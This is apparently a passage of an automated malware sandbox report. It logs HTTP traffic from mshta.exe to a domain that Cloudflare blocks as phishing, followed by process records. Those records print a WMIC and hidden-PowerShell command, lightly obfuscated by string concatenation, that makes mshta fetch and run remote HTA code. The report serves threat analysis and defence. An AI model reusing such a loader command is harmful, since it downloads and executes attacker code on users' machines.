                                        Accept-Language: en-CH
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: nextgencoding.cyou
                                        Connection: Keep-Alive
                                        2024-12-27 08:03:45 UTC562INHTTP/1.1 403 Forbidden
                                        Date: Fri, 27 Dec 2024 08:03:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Frame-Options: SAMEORIGIN
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0FqQnREmqgQB3pJ%2FrKa9HJjbW4tJ6kkwAav53jATEL1UNCWKG53kOWgpsALlL7fRtY%2BbHiNOexqJo34L8Uw%2Bq7Rqhp4JP9AOA%2BFMxGFbOeEPCTmb1%2BvVWJWZzALxb5ggkkgumg%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8f87cbbeead24405-EWR
                                        2024-12-27 08:03:45 UTC807INData Raw: 31 31 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                        Data Ascii: 11cb<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                        2024-12-27 08:03:45 UTC1369INData Raw: 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e
                                        Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
                                        2024-12-27 08:03:45 UTC1369INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20
                                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
                                        2024-12-27 08:03:45 UTC1018INData Raw: 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e
                                        Data Ascii: eveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1">
                                        2024-12-27 08:03:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.449731104.21.67.1244437944C:\Windows\System32\mshta.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-27 08:03:46 UTC398OUTGET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                        Accept: */*
                                        Referer: https://nextgencoding.cyou/asd/amber3
                                        Accept-Language: en-CH
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: nextgencoding.cyou
                                        Connection: Keep-Alive
                                        2024-12-27 08:03:47 UTC411INHTTP/1.1 200 OK
                                        Date: Fri, 27 Dec 2024 08:03:46 GMT
                                        Content-Type: text/css
                                        Content-Length: 24051
                                        Connection: close
                                        Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                        ETag: "675fc4ac-5df3"
                                        Server: cloudflare
                                        CF-RAY: 8f87cbc9ff698c24-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Fri, 27 Dec 2024 10:03:46 GMT
                                        Cache-Control: max-age=7200
                                        Cache-Control: public
                                        Accept-Ranges: bytes
                                        2024-12-27 08:03:47 UTC958INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                        Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                        2024-12-27 08:03:47 UTC1369INData Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f
                                        Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
                                        2024-12-27 08:03:47 UTC1369INData Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d
                                        Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
                                        2024-12-27 08:03:47 UTC1369INData Raw: 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 74 77 6f 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 6e 29 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 32 32 2e 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 32 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69
                                        Data Ascii: ld(2n),#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.four>.cf-column:nth-child(2n),#cf-wrapper .cf-columns.two>.cf-column:nth-child(2n){padding-left:22.5px;padding-right:0}#cf-wrapper .cf-columns.cols-2>.cf-column:nth-chi
                                        2024-12-27 08:03:47 UTC1369INData Raw: 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 6f 64 64 29 7b 63 6c 65 61 72 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 63 6f 6c 73 2d 34 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 34 6e 2b 31 29 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73 2e 66 6f 75 72 3e 2e 63 66 2d 63 6f 6c 75 6d 6e 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 63 6f 6c 75 6d 6e 73
                                        Data Ascii: ),#cf-wrapper .cf-columns.four>.cf-column:nth-child(odd){clear:none}#cf-wrapper .cf-columns.cols-4>.cf-column:first-child,#cf-wrapper .cf-columns.cols-4>.cf-column:nth-child(4n+1),#cf-wrapper .cf-columns.four>.cf-column:first-child,#cf-wrapper .cf-columns
                                        2024-12-27 08:03:47 UTC1369INData Raw: 30 3b 70 61 64 64 69 6e 67 3a 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 7d 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 33 7d 23 63 66 2d 77 72 61 70 70 65
                                        Data Ascii: 0;padding:0}#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3{font-weight:400}#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper strong{font-weight:600}#cf-wrapper h1{font-size:36px;line-height:1.2}#cf-wrapper h2{font-size:30px;line-height:1.3}#cf-wrappe
                                        2024-12-27 08:03:47 UTC1369INData Raw: 68 32 2b 68 34 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 32 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 35 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 68 36 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 33 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 34 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 6f 6c 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 68 35 2b 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2e 35 65 6d 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 3b 63 6f 6c
                                        Data Ascii: h2+h4,#cf-wrapper h2+h5,#cf-wrapper h2+h6,#cf-wrapper h3+h5,#cf-wrapper h3+h6,#cf-wrapper h3+p,#cf-wrapper h4+p,#cf-wrapper h5+ol,#cf-wrapper h5+p,#cf-wrapper h5+ul{margin-top:.5em}#cf-wrapper .cf-btn{background-color:transparent;border:1px solid #999;col
                                        2024-12-27 08:03:47 UTC1369INData Raw: 3a 23 36 32 61 31 64 38 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 31 36 33 39 35 39 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 69 6d 70 6f 72 74 61 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 62 64 32 34 32 36 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 3a 68 6f 76 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 62 74 6e 2d 65 72 72 6f 72 3a 68 6f 76 65 72 2c 23
                                        Data Ascii: :#62a1d8;border:1px solid #163959;color:#fff}#cf-wrapper .cf-btn-danger,#cf-wrapper .cf-btn-error,#cf-wrapper .cf-btn-important{background-color:#bd2426;border-color:transparent;color:#fff}#cf-wrapper .cf-btn-danger:hover,#cf-wrapper .cf-btn-error:hover,#
                                        2024-12-27 08:03:47 UTC1369INData Raw: 61 63 65 3a 6e 6f 77 72 61 70 7d 23 63 66 2d 77 72 61 70 70 65 72 20 69 6e 70 75 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 6c 65 63 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 65 78 74 61 72 65 61 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 39 39 39 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 34 30 34 30 34 30 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 36 36 36 37 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 34 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 65 6d 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e
                                        Data Ascii: ace:nowrap}#cf-wrapper input,#cf-wrapper select,#cf-wrapper textarea{background:#fff!important;border:1px solid #999!important;color:#404040!important;font-size:.86667em!important;line-height:1.24!important;margin:0 0 1em!important;max-width:100%!importan
                                        2024-12-27 08:03:47 UTC1369INData Raw: 3a 23 34 30 34 30 34 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 3a 37 2e 35 70 78 20 31 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 61 6c 65 72 74 20 2e 63 66 2d 63 6c 6f 73 65 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 2e 37 35 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 70 61 64 64 69 6e
                                        Data Ascii: :#404040;font-size:13px;padding:7.5px 15px;position:relative;vertical-align:middle;border-radius:2px}#cf-wrapper .cf-alert:empty{display:none}#cf-wrapper .cf-alert .cf-close{border:1px solid transparent;color:inherit;font-size:18.75px;line-height:1;paddin


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.449732104.21.67.1244437944C:\Windows\System32\mshta.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-27 08:03:48 UTC416OUTGET /cdn-cgi/images/icon-exclamation.png?1376755637 HTTP/1.1
                                        Accept: */*
                                        Referer: https://nextgencoding.cyou/asd/amber3
                                        Accept-Language: en-CH
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: nextgencoding.cyou
                                        Connection: Keep-Alive
                                        2024-12-27 08:03:49 UTC409INHTTP/1.1 200 OK
                                        Date: Fri, 27 Dec 2024 08:03:48 GMT
                                        Content-Type: image/png
                                        Content-Length: 452
                                        Connection: close
                                        Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                        ETag: "675fc4ac-1c4"
                                        Server: cloudflare
                                        CF-RAY: 8f87cbd6b9fe41bd-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Fri, 27 Dec 2024 10:03:48 GMT
                                        Cache-Control: max-age=7200
                                        Cache-Control: public
                                        Accept-Ranges: bytes
                                        2024-12-27 08:03:49 UTC452INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 36 00 00 00 36 08 03 00 00 00 bb 9b 9a ef 00 00 00 33 50 4c 54 45 c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f c1 45 3f ab b2 22 ed 00 00 00 11 74 52 4e 53 00 40 30 10 60 8f bf ff ef 7f af 9f df 20 50 cf 70 60 82 c8 9b 00 00 01 2f 49 44 41 54 78 01 bd d3 05 d2 b4 30 10 06 e1 8e 6c de c1 36 dc ff b2 9f 2b 95 c9 12 7e 79 4a 91 46 22 b8 c2 8b c8 80 94 6f 45 1f ac 4c 81 33 f2 ac 03 5b 1e 95 69 32 b5 94 6e 98 57 79 4a c4 91 8a 7a 26 9a 82 a9 af a4 46 95 f5 d0 1a fb 95 c7 62 bf b2 f2 e9 70 7e e3 a7 a0 df ee 7c 3a 74 35 f1 6d b3 b3 99 66 70 af 69 f2 2f 65 ef c7 fa 99 25 de 25 1b c9 b4 f0 6e d2 50 a6 ed fb 65
                                        Data Ascii: PNGIHDR663PLTEE?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?E?"tRNS@0` Pp`/IDATx0l6+~yJF"oEL3[i2nWyJz&Fbp~|:t5mfpi/e%%nPe


                                        Statistics

                                        CPU Usage

                                        Click to jump to process

                                        Memory Usage

                                        Click to jump to process

                                        High Level Behavior Distribution

                                        Click to dive into process behavior distribution

                                        Behavior

                                        Click to jump to process

                                        System Behavior

                                        General

                                        Target ID:0
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\wbem\WMIC.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
                                        Imagebase:0x7ff6660f0000
                                        File size:576'000 bytes
                                        MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:1
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:2
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:3
                                        Start time:03:03:39
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff7699e0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:4
                                        Start time:03:03:41
                                        Start date:27/12/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://nextgencoding.cyou/asd/amber3"
                                        Imagebase:0x7ff788560000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        General

                                        Target ID:5
                                        Start time:03:03:42
                                        Start date:27/12/2024
